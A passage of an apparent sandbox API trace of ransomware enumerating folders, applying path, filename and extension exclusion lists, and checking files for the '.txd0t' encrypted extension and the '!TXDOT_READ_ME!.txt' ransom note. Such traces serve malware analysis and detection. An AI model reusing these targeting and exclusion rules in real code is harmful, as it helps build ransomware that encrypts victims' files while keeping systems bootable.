psz2="desktop.ini") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.580] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.580] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.580] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.580] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.580] GetProcessHeap () returned 0xe30000 [0128.580] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.580] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0128.580] StrCmpW (psz1="1035", psz2=".") returned 1 [0128.580] StrCmpW (psz1="1035", psz2="..") returned 1 [0128.580] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1035", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.580] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system32\\") returned 0x0 [0128.580] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.580] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\local\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\boot\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\perflogs\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\programdata\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\drivers\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\wsus\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="crypt_detect") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="cryptolocker") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="ransomware") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\WINDOWS") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.581] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files") returned 0x0 [0128.581] GetProcessHeap () returned 0xe30000 [0128.581] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.581] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.581] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\*") returned="C:\\588bce7c90097ed212\\1035\\*" [0128.581] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0128.581] StrCmpW (psz1=".", psz2=".") returned 0 [0128.581] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.581] StrCmpW (psz1="..", psz2=".") returned 1 [0128.581] StrCmpW (psz1="..", psz2="..") returned 0 [0128.581] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5828f8fb, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.582] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.582] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.582] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0128.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1035\\!TXDOT_READ_ME!.txt" [0128.582] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.582] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.582] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.582] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1076, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.582] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.582] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.582] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0128.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t" [0128.582] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.582] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.582] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12ede, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.582] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.582] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.582] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.582] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0128.583] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.txd0t" [0128.583] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.583] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.583] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.583] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.583] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.583] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0128.583] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0128.583] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" [0128.583] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.583] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.583] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.583] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.583] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.583] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.583] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0128.583] GetProcessHeap () returned 0xe30000 [0128.583] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.583] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0128.584] StrCmpW (psz1="1036", psz2=".") returned 1 [0128.584] StrCmpW (psz1="1036", psz2="..") returned 1 [0128.584] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.584] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.584] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1036", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system32\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\local\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\boot\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\perflogs\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\programdata\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\drivers\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\wsus\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="crypt_detect") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="cryptolocker") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="ransomware") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\WINDOWS") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.584] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files") returned 0x0 [0128.584] GetProcessHeap () returned 0xe30000 [0128.584] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.584] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.584] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\*") returned="C:\\588bce7c90097ed212\\1036\\*" [0128.584] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.585] StrCmpW (psz1=".", psz2=".") returned 0 [0128.585] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.585] StrCmpW (psz1="..", psz2=".") returned 1 [0128.585] StrCmpW (psz1="..", psz2="..") returned 0 [0128.585] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x582d8947, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.585] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.585] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.585] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0128.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1036\\!TXDOT_READ_ME!.txt" [0128.585] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.585] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.585] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.585] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfc6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.585] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.585] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.585] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.585] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0128.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", 